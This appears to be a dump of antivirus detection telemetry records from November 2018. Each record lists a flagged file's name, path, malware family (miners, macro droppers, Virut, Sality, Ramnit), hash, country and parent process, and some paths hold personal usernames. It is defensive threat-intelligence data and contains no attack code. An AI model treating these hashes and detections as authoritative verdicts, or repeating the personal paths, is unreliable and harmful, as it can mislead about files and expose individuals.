  Row(detection=Row(filename='msiexec64_11b95102.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_14-01-20\\msiexec64_11b95102.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe420_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe420 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T09:09:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='2c3fbe87f1c5c345cd715ba1bccc0668.smp', filepath='\\\\192.168.10.10\\SHARED\\_tools\\runtime\\scan\\tmp_1922290538\\2c3fbe87f1c5c345cd715ba1bccc0668.smp', filesize=192000, name='HEUR/AGEN.1004975.#M1.#R1'), hash='900ce72da4308baed2fb91a684864a8aa232842bc27c23d8b8c2d72a284b4f33', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\tools\\http_server\\http_server.exe', parentsize=6242816, timestamp='2018-11-04T20:36:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='enumdevlib.dll', filepath='C:\\Program Files\\Realtek\\USB Wireless LAN Utility\\EnumDevLib.dll', filesize=320000, name='HEUR/AGEN.1015211.#M1.#R1'), hash='b1a9b2ef000917214c0198958cbd239d1d91b1720ec40df041262a34d302ad74', metadata=Row(cmdline='\\\\\\/Q', country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Realtek\\USB Wireless LAN Utility\\RtWLan.exe', parentsize=2035416, timestamp='2018-11-04T08:29:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T01:59:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup_winthruster_2016.exe', filepath='C:\\Users\\X\\Downloads\\Setup_WinThruster_2016.exe', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T13:58:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T13:28:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T21:20:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T12:36:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='0d1593e54e93e09077e3ca8722f813d99da89241786fbc8a9bbce08446682b95', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T22:26:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T22:50:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='bestellung_632351_28_11_2017.doc', filepath='C:\\Users\\X\\AppData\\Local\\IM\\Identities\\{22355ACC-DC05-4C99-BABC-FB5A45E577B4}\\Message Store\\Messages\\1\\{4AA0D800-2AD4-4E96-87F6-F9BE70260ED8}\\Attachments\\Bestellung_632351_28_11_2017.doc', filesize=192000, name='W97M/Agent.6440813.#M1.#R1'), hash='58cadddebc97fa1af22e6f7e7ea1a4044e0832a3602d6017dbf8f0eef70049a4', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IncrediMail\\Bin\\IncMail.exe', parentsize=444424, timestamp='2018-11-04T15:13:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='unt591a.tmp.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\U5919.tmp\\UNT591A.tmp.exe', filesize=636000, name='TR/Agent.636000.#M1.#R1'), hash='4affd24c9f82a4b944e5341be867198ae6877557d7f1f50d6618ca2cbb7f6c91', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T21:05:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup (1).exe', filepath='C:\\Users\\X\\Downloads\\setup (1).exe', filesize=588000, name='PUA/Outbrowse.Gen.#M300.#R5962'), hash='0d9206094bb544f8dccce4769f52c167f2fc4aac3b1e6eecfb47053bc5da7b9d', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2391280, timestamp='2018-11-04T14:19:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp000622b2', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp000622b2', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T10:48:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-163053-4571f53d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-163046-44AB2C33\\AVSCAN-20181104-163053-4571F53D', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='0db8d2133327b4b22206fee7412826e1843df743358048be655c045258de3207', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:30:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='htccalc.exe', filepath='C:\\Program Files (x86)\\Boxs Cracked 2015-2016\\AutoPlay\\Docs\\Volcano Tool\\bin\\HTCCALC.exe', filesize=3392000, name='W32/Sality.AT.#M1.#R1'), hash='dc89f8c174ad6632efaa2e672615d4c58372509964e57216b49356c82c73e1b5', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:p+Ta9JKF2UqQPnN1.1', country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T12:26:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T11:09:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T05:49:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T11:39:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-150303-71e9dbba', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2b316d9b\\AVSCAN-20181104-145604-28DEF0E8\\AVSCAN-20181104-150303-71E9DBBA', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5642847f2a431c9c5852b1e5ebe606f11acd628c251cc8d30f75beadc612518d', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:03:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup_winthruster_2016.exe', filepath='D:\\Postfinance\\Setup_WinThruster_2016.exe', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline='\\\\\\/s \\\\\\"NortonSecurity\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Norton Security\\\\\\\\Engine\\\\\\\\22.16.0.247\\\\\\\\diMaster.dll\\\\\\" \\\\\\/prefetch:1', country='CH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Norton Security\\Engine\\22.16.0.247\\NortonSecurity.exe', parentsize=328648, timestamp='2018-11-04T10:43:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T10:02:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T09:46:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='nice bottle', filepath="/Volumes/MAC BU/Backups.backupdb/Daniel's MacBook Pro (2)/2017-06-21-053655/Hard Drive/Users/Danny/Documents/mac book pro/Nice Bottle", filesize=64000, name='W97M/MARKER.HR.#M0.#R0'), hash='0440773f5de89064f083bcd1091c75a8746fcbfbf32e980e265d4974bea36fd8', metadata=Row(cmdline=None, country='CA', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T10:56:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-174747-ca202a71', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e09dc19c\\AVSCAN-20181104-133548-4D3A2C82\\AVSCAN-20181104-174747-CA202A71', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:47:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='rad4ab80.tmp.exe', filepath='C:\\Documents and Settings\\X\\Local Settings\\Temp\\rad4AB80.tmp.exe', filesize=192000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='e3786ecd97f36eb1160b9eb50df42a58590d307c4b5e962bc7711bab4f8e7882', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:34:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='95c45fa1ebfc6fb9ae18571480e6952e9adcba0a53bd164d8c3cfc1aca6d460c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-35.categorizing\\95C45FA1EBFC6FB9AE18571480E6952E9ADCBA0A53BD164D8C3CFC1ACA6D460C', filesize=448000, name='W32/Ramnit.C.#M1.#R1'), hash='95c45fa1ebfc6fb9ae18571480e6952e9adcba0a53bd164d8c3cfc1aca6d460c', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 19.0.0\\avp.exe', parentsize=619640, timestamp='2018-11-02T12:59:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T13:47:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='b021b8086f70d888da7927cec6e1749261069baa7d5e95d81194bc89be49413e', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T17:02:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='TR/Miner.eevge.#M1.#R1'), hash='f6fbbd041481cca2e5e9fd947cd34e0dc066cb16a26cae3b37465c5a59d3403f', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:47:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='E:\\Users\\X\\Desktop\\ZEN Miner\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:58:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='edman.exe', filepath='C:\\Users\\X\\AppData\\Local\\edman.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='a412281a455c5f83b9fee64c1725a50241a0f9917bd531b2a2ded0fda300cfc5', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\blockade\\ultimately.exe', parentsize=49429, timestamp='2018-11-02T14:41:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='casino autobot.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa6564.24695\\Casino AutoBot.exe', filesize=1280000, name='HEUR/APC.#M1.#R1'), hash='8eb2120570a10c18f117cdecc28c116186c0048d02882053ca3bd93e38dcfdf0', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:15:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8e025dde317853e9b3d0f19a3c9754e7f959d562dd7627073c9891256044558b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\8E025DDE317853E9B3D0F19A3C9754E7F959D562DD7627073C9891256044558B', filesize=1472000, name='TR/Crypt.ZPACK.Gen.#M300.#R3881'), hash='8e025dde317853e9b3d0f19a3c9754e7f959d562dd7627073c9891256044558b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:54:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='typeperf.exe', filepath='H:\\TẤT CẢ\\KHONG DUOC XOA\\O C\\WINDOWS\\system32\\dllcache\\typeperf.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='8f63e8ba8689541d8e7bc877eb771756fee5f3920f876f63b18b5638ef15a55e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2501368, timestamp='2018-11-02T10:37:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ivsttveu.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\IvSTtVEU.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:35:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-172128-158cedb1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c1e6306a\\AVSCAN-20181102-172111-12EEB01C\\AVSCAN-20181102-172128-158CEDB1', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='a3f1f27443b1201b01fefdae9e5b5f27a3ac6422359ea85a8f89a2d5d080e148', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:21:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='E:\\Users\\X\\Desktop\\ZEN Miner\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:09:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:06:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='p711s-e5_update_21.110.99.03.00.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\7zE4BF831AB\\E5573 UNLOCK\\2nd STEP(Huawei_E5573s-606_Firmware_21.110.99.03.00)\\P711s-E5_Update_21.110.99.03.00.exe', filesize=51456000, name='W32/Ramnit.CD.#M1.#R1'), hash='b14a8c1efd1b89b78cbe4989cee5f38fa16aa4a95852bc4aedbd3e2b0d9bca8a', metadata=Row(cmdline=None, country='CM', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2373784, timestamp='2018-11-02T07:59:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='adb.exe', filepath='E:\\Program Files\\SRSRoot\\adb.exe', filesize=896000, name='W32/Sality.AT.#M1.#R1'), hash='dba925fd5808e08c2accddcbf25f4ec77c6b72268dbed4df221f1ddea2015655', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:11:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='driverreviver.exe', filepath="D:\\2016\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\DriverReviver.exe", filesize=64000, name='BDS/Rogue.766035.#M1.#R1'), hash='a4d3abd76129e10fefa2c2650cfd46e28530b443f76755f23d3f2e7b5c996f07', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-02T03:16:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='data.exe', filepath='F:\\DATA.EXE', filesize=1600000, name='TR/Crypt.CFI.Gen.#M300.#R2273'), hash='a8504fe17a19d3eefd1a43c116c9e6913de878d72a2f96cb02876be404e0adcf', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-02T16:16:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='iucgrvop4x.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsx1468.tmp\\iucGrVOP4X.exe', filesize=2880000, name='TR/Crypt.XPACK.Gen2.#M300.#R100322'), hash='e8188847addfe132a90a1f201b0c9a49d0c62e843bec22b0ebabea7a95a25d2f', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Adobe Acrobat Pro DC 2019.008.20080 + Crack [CracksNow]\\Adobe Acrobat Setup\\Adobe Acrobat\\Setup.exe', parentsize=545317, timestamp='2018-11-02T08:26:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-123146-1c3b1bfe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-122734-FEF1B120\\AVSCAN-20181102-123146-1C3B1BFE', filesize=128000, name='Adware/AD.Elex.wfnhx.#M1.#R1'), hash='a393a64f854d2cfefb2ce8d2af8cd047993e12258ca24c31ec3e54d6ebcff0f2', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:29:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bilibili.vir', filepath='\\\\?\\C:\\Program Files (x86)\\bilibili\\bilibili.VIR', filesize=128000, name='ADWARE/Adware.Gen7.#M300.#R601658'), hash='b33ad7d6f22ca8a8556926cd6bb0e8d8fc9962e540ed2ca3200e75a5735c3c72', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='snare.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\CSHMDR\\Snare.dll', filesize=832000, name='TR/Snarasite.ME.15.#M1.#R1'), hash='fea6e6814f6c07f0cbc5e609755c7131cf91ccff7843eb7ad6653c8c99b9d2e8', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:49:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='smboottime.exe', filepath='C:\\Program Files (x86)\\IObit\\Advanced SystemCare\\smBootTime.exe', filesize=1268000, name='TR/Decep.IObit.EN.#M1.#R1'), hash='edc30c30be7b2a18716ee90d8954541b53f3074a74648754f633cbe877554579', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:18:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-081459-39114ce7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_78554da8\\AVSCAN-20181102-081049-1917AE4E\\AVSCAN-20181102-081459-39114CE7', filesize=64000, name='BDS/Rogue.766002.#M1.#R1'), hash='c52dabe8d138d077358065c61a91b37e1ec4311e69e5b26e8f950f5d25c0c474', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:14:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-141954-3c5ef949', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ad55d25d\\AVSCAN-20181102-141852-3357C3F0\\AVSCAN-20181102-141954-3C5EF949', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:19:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\a5zpf540hxu\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Roaming\\info.exe', parentsize=1214976, timestamp='2018-11-02T18:34:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-222051-8fb2c3f9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221829-7A5CEC69\\AVSCAN-20181102-222051-8FB2C3F9', filesize=64000, name='BDS/Rogue.766002.#M1.#R1'), hash='c52dabe8d138d077358065c61a91b37e1ec4311e69e5b26e8f950f5d25c0c474', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:20:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-110642-ba6d00b9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6ecee166\\AVSCAN-20181102-110609-B4FC2F3A\\AVSCAN-20181102-110642-BA6D00B9', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='d146370124aef2293ad1d5a50803badc58c645779e423317d330c705ea055319', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:39Z'), dt=datetime.date(2018, 11, 2)),
